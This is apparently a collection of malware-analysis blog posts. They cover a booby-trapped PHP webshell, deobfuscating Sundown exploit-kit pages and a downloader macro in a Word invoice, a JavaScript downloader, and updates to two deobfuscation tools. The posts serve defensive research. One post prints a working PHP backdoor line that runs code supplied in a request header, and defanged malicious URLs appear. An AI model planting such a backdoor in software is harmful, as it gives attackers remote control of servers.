Webshell with a Booby Trap

I came across three interesting PHP scripts that were presumably dropped by the same attacker. Perhaps this is old news but it’s something new to me.

Here’s the first one which looks innocent enough.

2015-07-24_01

However, if you put in the wrong password, you can end up at a malicious or phishing page.

2015-07-24_02

hxxp://d.pxer.tk/i.php
hxxp://a6shd.realshieldlinked.com
hxxp://zmkzz.allvideos.7664.info

Inspecting the traffic shows that the password you tried gets captured.

2015-07-24_03

Here’s what the panel looks like:

2015-07-24_04

This is the second script which looks like it failed to do anything:

2015-07-24_05

Nope, the script works just fine. It dropped a webshell in the folder.

2015-07-24_06

If you look closely, you can see that the initial file resembles a JPEG file. The file does open up as a normal graphic but embedded in it are scripts that can execute PHP, ASP, and JSP commands as well as drop a PHP webshell.

2015-07-24_07

The third script looks like this when you open it in the browser. It’s a seemingly benign page from the PHP Documentation website.

2015-07-24_08

However, if you append a certain value to the URL, a hidden feature is enabled at the bottom of the page and you can now upload any file of your choice.

2015-07-24_09

Ah, more things to be on the lookout for…

Posted in Malscript | Tagged , , | Comments Off on Webshell with a Booby Trap

Converter Updated

The latest version includes several new features which I’d like to highlight here:

Enhanced Range Search/Replace
The feature can be found by going to this menu item under Tools:

2015-06-20_01

You can now add incrementers as a text replacement as seen in this graphic. Just add ^i if you want to start with 0 or ^I if you want to start with 1. If you check the “Keep Enclosed Contents” box, the “from” and “to” values will be included in the results (inclusive).

2015-06-20_02

The other option is called “Keep Value From String… and To String…” which just keeps the in-between values.

2015-06-20_03

New Hashing Algorithms
Added new hashing algorithms (credit: Karim Wafi) under the stats menu:

2015-06-20_04

Convert Mixed Format
I moved the mixed format options from under the Format menu to its own form under the Tools menu. I included examples so you can understand what it’s used for.

2015-06-20_05

I also added a “Mixed Entities to Hex” feature. There’s a button on the main screen called “Decode HTML” to decode HTML entities but if your input string has a mixture of HTML entities and other text, it fails. This feature will convert your input to hex then you can convert it back to text to get your results.

2015-06-20_06

Microsoft Script Decoder
Microsoft Script Encoded strings are now being seen in the wild. I added a script encoder and decoder function in two places (credit: Jean-Luc Antoine and Shawn Stugart).

If you have a large file to convert, you can use the Convert Script File option by going here:

2015-06-20_07

This is the form which allows you to choose an input file, output file, and option.

2015-06-20_08

Your input file you wish to decode needs to contain only the script which starts with #@~^… and ends with ^#~@.

2015-06-20_09

If you have a short string to decode then you can use the Script Encoder/Decoder feature which is located under the Tools menu.

2015-06-20_10

Just paste in the script and make sure it contains the starting and ending key values.

2015-06-20_11

Deobfuscating “Sundown EK”
Now let’s use some of the features to deobfuscate “Sundown’s” landing pages. Here’s a look at exploit chain in Fiddler (credit: Kafeine):

2015-06-20_12

The first file is the landing page which looks like this:

2015-06-20_13

Paste that into Converter, choose Tools > Convert Mixed Format, click on the Mixed Entities to Hex option and click on Convert. To makes things a bit easier, choose the “Percent” output format at the bottom. (This saves you from having to do a Format > Hex Format – % in the next step.)

2015-06-20_14

Click on the “Copy Output to Input” button then click on the “Hex to Text” button. Almost done…you can see some hex values in there.

2015-06-20_15

So click on the “Copy Output to Input” button then click on the “Unescape” button. Now we’re done.

2015-06-20_16

Back to Fiddler…I chose the 10th item called “street4.php.htm”. Here’s what that looks like:

2015-06-20_17

There’s three scripts on this page. Two are encoded as “JScript.Encode” and the third as “VBScript.Encode”, however, it’s the same encoder. I did the first one above so let me do the second.

2015-06-20_18

Click on “Send Data to Main” then click on the “Unescape” button.

2015-06-20_19

For the third script, let me paste that into its own file.

2015-06-20_20

I make my selections and click Convert.

2015-06-20_21

And we’re done!

2015-06-20_22

Here are the other changes/fixes that were made to Converter:

  • Update the Beautify JS and HTML function (credit: jsbeautifier.org)
  • Correctly rotate non-CSV hex values and the text values in the Key Search/Convert feature
  • Clear the output text box when the Import Binary File function starts
  • Update the results when the space and colon delimiter options is used in conjunction with Format > Hex function
  • Add new input delimiter to Convert Base feature
  • Include last value when doing Octal to Hex function
  • Add new options colon, space and unicode to Format > Hex Format feature

You can download Converter here. Thank you for your support!

Posted in Malscript, Tools | Tagged , , , , , | Comments Off on Converter Updated

Malicious Word Macro Caught Using Sneaky Trick

There has been a slew of malicious Word documents attached to email purporting to be invoices, receipts, etc. This particular one caught my eye but I’m not sure if this is an old trick. I just haven’t seen this method used before and thought it was quite clever.

Here’s the email that had a zipped file attached. The zipped file contained a Word document. The email in poor English says, “Thank you for payment. Your invoice…is attached. Thank you for your business – we appreciate it very much.”

2015-03-06_01

Opening the Word document, first thing you’ll notice is the security warning and below it a bunch of garbled text. A message above it says, “If you document have incorrect encoding – enable macro.”

2015-03-06_02

Clicking on the “Enable Content” button then reveals the invoice, making this (slightly) more believable and possibly enough to convince the unsuspecting recipient.

2015-03-06_03

Using OfficeMalScanner, the macros, specifically the one called “ThisDocument” can be dumped to a file for analysis.

2015-03-06_04

Let’s try it with OleDump. It nicely shows the objects inside of the document.

2015-03-06_05

We can also dump the ‘ThisDocument’ object.

2015-03-06_06

Looking at the macro, we can see a bunch of string concatenation going on and typical garbage in between legitimate VBA code.

2015-03-06_07

A quarter ways in, there’s some URLs to take note of.

2015-03-06_08

Basically the VBA macro builds a VBS script and writes it out.

2015-03-06_09

Interestingly, this VBS calls up a Powershell file. How vogue. It’s now very clear what it’s doing — downloading and executing a file from Internet then downloading an image for statistics and cleaning up.

2015-03-06_10

Let me download the file…

2015-03-06_11

And see what VirusTotal has to say…

2015-03-06_12

Regarding that image download, here’s what it is:

2015-03-06_13

The image’s download stats are in that red box. Not sure how many are victims vs security folks but that could be an impressive number.

2015-03-06_14

Going back to the macro, I wanted to find out how it “decrypted” the gibberish into text. Near the bottom, I see reference to “findText” and “secondText” followed by some clean-up code.

2015-03-06_15

The findText subroutine shows that it looks for content between “<select></select>” tags then deletes it.

2015-03-06_16

The secondText routine looks for “<inbox></inbox>” tags and changes the contents’ font color to black.

2015-03-06_17

Ah! It’s not doing any decryption, it’s just some clever sleight of hand. The invoice text was there all along, hidden with white text. Here you can see the hidden content in green.

2015-03-06_18

Sneaky indeed.

Posted in Malicious Email, Malscript | Tagged , , , , , , | Comments Off on Malicious Word Macro Caught Using Sneaky Trick

Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look.

2015-03-03_01

It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ‘)’; // this equates to ‘G’

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…

2015-03-03_02

Or fix it up…

2015-03-03_03

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

2015-03-03_04

When the script is executed, I get the following values:

2015-03-03_05

Now I just replace the variable names with the corresponding values to get the final result. This creates a function with a value passed via the header (probably includes ‘preg_replace’) which turns this into a well-hidden backdoor.

if(md5(getenv(HTTP_A)) == 5d15db53a91790e913dc4e05a1319c42) $bIywY=create_function(‘$a, $b, $c’, getenv(HTTP_X_UP_CALLING_LINE_ID));
$bIywY(x1o6Vm2, WFrkAj9, QcFS0u);

Be sure you check out Bart’s blog to learn more about this particular script.

Posted in Malscript | Tagged , , | Comments Off on Deobfuscating a Wicked-Looking Script

Revelo Updated

A colleague of mine received the following email in their Gmail in-box and wondered how it got past their filters and what it does.

2015-02-15_01

What almost tricked him was the fact that it called out his name. Only after looking at the originating email address did it make him pause. Good thing they didn’t spoof that. Let’s have a look at the attachment.

2015-02-15_02

It’s a Javascript file. Malicious scripts are hard to detect because it’s so easy to modify and customize. By the looks of this, it concatenates a value to the variable ‘a’ then jumps to another function. It keeps doing this until the very end then evals it. The problem is trying to find the “end”. Can you find it?

2015-02-15_03

First let’s deobfuscate this manually. You will need to find the end of all of the concatenation it’s doing then replace the eval with alert. After spending about a minute of eyeballing the script, I gave up. I did a search for “(a)” and found in the middle.

2015-02-15_04

Just change that to “alert(a)” and execute the file with your browser and you’ll see what it does.

2015-02-15_05

An easier way is just to append the short script at the end like this. When you run the script, you get the same result as above.

2015-02-15_06

The deobfuscated script, by the way, makes an AJAX call to a website at tripenjoy.com, downloads a unique file which poses as a JPEG image, renames it as an executable, then runs it.

2015-02-15_07

The downloaded file is definitely not a JPEG image.

2015-02-15_08

The payload keeps changing and the latest one I got was a nearly FUD malware according to VirusTotal.

2015-02-15_09

I’ve been meaning to update Revelo and this script prompted me to do it. The latest version allows you to deobfuscate these types of scripts quicker now by doing the same method we used above.

Run Revelo and paste in the Javascript (or open the file). Revelo needs the “<script></script>” tags so just click on Options > Add Script Tags and it will do so automatically.

2015-02-15_10

Choose the “Append Variable to End” method, type in “a” (the name of the variable we want to view) and click on Execute. Done!

2015-02-15_11

The second method I added is called “Intercept Return and Variable”. What this will do is intercept a user-specified variable that’s being returned from a function back to the caller.

Here’s an example. The script below passes a series of numbers to “CRYPT.obfuscate” then onto a “CRYPT.decode” function. The decode function decodes the values, converts it to a string then returns the deobfuscated result which has been highlighted in red.

2015-02-15_12

All you need to do is select the new method and enter “return output” and click on Execute. Done!

2015-02-15_13

I also added three more options to the menu:

2015-02-15_14

    * “Send Results to Prompt when Possible” – will try to display the results in this way: prompt(1,variable).
    * “Use Double Quote” – when trying various methods to deobfuscate a script, inserting single quotes into the script may mess things up so if this option is selected, double quotes will be used instead.
    * “Convert Object to Text” – simply appends “.text” to objects in order to convert them to text where appropriate.

The latest version of Revelo is available on the Tools page.

Posted in Malicious Email, Malscript, Tools | Tagged , , | Comments Off on Revelo Updated